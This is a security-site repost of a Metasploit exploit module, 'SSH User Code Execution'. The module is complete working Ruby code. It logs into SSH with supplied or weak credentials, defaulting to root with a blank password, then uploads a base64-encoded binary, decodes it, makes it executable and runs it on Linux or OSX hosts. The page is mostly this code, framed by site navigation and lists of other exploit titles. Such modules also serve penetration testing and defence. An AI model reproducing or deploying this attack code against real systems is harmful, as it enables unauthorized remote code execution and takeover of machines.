首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SSH User Code Execution
来源:metasploit.com 作者:McIntyre 发布时间:2013-05-17  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::CmdStagerBourne

	attr_accessor :ssh_socket

	def initialize
		super(
			'Name'        => 'SSH User Code Execution',
			'Description' => %q{
				This module utilizes a stager to upload a base64 encoded
				binary which is then decoded, chmod'ed and executed from
				the command shell.
			},
			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
			'References'  =>
				[
					[ 'CVE', '1999-0502'] # Weak password
				],
			'License'     => MSF_LICENSE,
			'Privileged'  => true,
			'DefaultOptions' =>
				{
					'PrependFork' => 'true',
					'EXITFUNC' => 'process'
				},
			'Payload'     =>
				{
					'Space'    => 4096,
					'BadChars' => "",
					'DisableNops' => true
				},
			'Platform'    => [ 'osx', 'linux' ],
			'Targets'     =>
				[
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						},
					],
					[ 'Linux x64',
						{
							'Arch' => ARCH_X86_64,
							'Platform' => 'linux'
						},
					],
					[ 'OSX x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'osx'
						},
					],
				],
			'DefaultTarget'  => 0,
			# For the CVE
			'DisclosureDate' => 'Jan 01 1999'
		)

		register_options(
			[
				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
				OptString.new('RHOST', [ true, "The target address" ]),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
			]
		)
	end

	def execute_command(cmd, opts = {})
		begin
			Timeout.timeout(3) do
				self.ssh_socket.exec!("#{cmd}\n")
			end
		rescue ::Exception
		end
	end

	def do_login(ip, user, pass, port)
		opt_hash = {
			:auth_methods  => ['password', 'keyboard-interactive'],
			:msframework   => framework,
			:msfmodule     => self,
			:port          => port,
			:disable_agent => true,
			:password      => pass
		}

		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
		rescue Rex::ConnectionError, Rex::AddressInUse
			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
		rescue Net::SSH::Disconnect, ::EOFError
			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
		rescue Net::SSH::AuthenticationFailed
			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
		rescue Net::SSH::Exception => e
			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
		end

		if not self.ssh_socket
			fail_with(Exploit::Failure::Unknown)
		end
		return
	end

	def exploit
		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
		execute_cmdstager({:linemax => 500})
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serva 32 TFTP 2.1.0 - Buffer O
·Mutiny 5 Arbitrary File Upload
·Quick Search Version 1.1.0.189
·Nginx 1.3.9 / 1.4.0 Denial Of
·Kloxo 6.1.12 Privilege Escalat
·Glibc 2.11.3 / 2.12.x LD_AUDIT
·ERS Viewer 2011 ERS File Handl
·D-Link DIR615h OS Command Inje
·Avira Personal Privilege Escal
·Ophcrack 3.5.0 - Local Code Ex
·Linux PERF_EVENTS Local Root
·Linksys WRT160nv2 apply.cgi Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved